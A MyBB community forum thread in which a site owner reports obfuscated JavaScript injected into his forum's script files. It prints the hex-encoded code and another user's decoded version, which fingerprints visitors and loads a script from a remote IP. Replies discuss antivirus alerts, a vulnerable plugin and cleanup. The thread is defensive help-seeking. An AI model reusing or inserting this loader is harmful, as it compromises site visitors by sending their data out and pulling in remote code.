MyBB Community Forums

Full Version: New ---Trojan Upload problem Js:Agent-PL(Trj) --as reported by Avast
You're currently viewing a stripped down version of our content. View the full version with proper formatting.
I want to report a trojan that was uploaded by some one to MYBB forum ...whenever I tried to load pages of my forum it was showing Trojan in Pages of my forum .

Later by searching in code's , I found out the code of Trojan which was inserted into Javascipt files and deleted that ...Here is the code ....

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x73\x63\x72\x69\x70\x74","\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74","\x69\x64","\x73\x72\x63","\x68\x74\x74\x70\x3A\x2F\x2F\x39\x31\x2E\x31\x39\x36\x2E\x32\x31\x36\x2E\x36\x34\x2F\x73\x2E\x70\x68\x70\x3F\x72\x65\x66\x3D","\x26\x63\x6C\x73\x3D","\x26\x73\x77\x3D","\x26\x73\x68\x3D","\x26\x64\x63\x3D","\x26\x6C\x63\x3D","\x26\x75\x61\x3D","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;


Can anyone give me some tips to avoid such attacks .....Thanks in advance...!!
Are you using FaceBook Connect by Nayar ?? Upgrade it if Yes.
My AV detects it as well but it's not doing anything because the javascript is not parsed. However the AV reports it despite being parsed or not.
Yeah then it's not a false positive. This has been floating around the past day or so. My Avast AV was triggered by this thread as well. So that code is in some form malicious.

If your AV is not going off you might actually have more of a problem.
The decoded script is as follows:

var _0xdc8d=["sc_co","getElementById","colorDepth","width","height","charset","location","referrer","userAgent","script","createElement","id","src","http://91.196.216.64/s.php?ref=","&cls=","&sw=","&sh=","&dc=","&lc=","&ua=","head","getElementsByTagName","appendChild"];
element=document[_0xdc8d[1]](_0xdc8d[0]);
if(!element){
	cls=screen[_0xdc8d[2]];
	sw=screen[_0xdc8d[3]];
	sh=screen[_0xdc8d[4]];
	dc=document[_0xdc8d[5]];
	lc=document[_0xdc8d[6]];
	refurl=escape(document[_0xdc8d[7]]);
	ua=escape(navigator[_0xdc8d[8]]);
	var js=document[_0xdc8d[10]](_0xdc8d[9]);
	js[_0xdc8d[11]]=_0xdc8d[0];
	js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;
	var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);
};

The AV programs are probably throwing the warnings on the IP/URL which is detected even though its hex coded. The IP/URL is from russia and it seems is blacklisted by the av programs.

As far as the OP's problem of the script actually being ran and showing a trjan window, which is what this script does, it should not happen in normal circumstances unless you have enabled posting html or have a plugin that has an exploit which allows javascripts to get executed
(2012-01-06, 11:38 PM)labrocca Wrote: [ -> ]Yeah then it's not a false positive. This has been floating around the past day or so. My Avast AV was triggered by this thread as well. So that code is in some form malicious.

If your AV is not going off you might actually have more of a problem.

It is a false positive. HTML is disabled here and the thing doesn't run but the AV detects the IP.
Pirata, i think he's saying someone put that into one of his js files on his forum.
I am having this problem on my forum too.
How can i fix it ?

Thanks
@Booher yes you're right I guess.

If that was inserted into your JS files you must remove the code and search for the door which allowed the hacker to insert the code.
This is the problem I have as well. As soon as I replace the files my site become re-infected. Is there a way to find out how it's getting in or a list of the tightest permissions setting somewhere for security.

And also how does one disable HTML on their forum, I remember seeing it somewhere but can't seem to find it?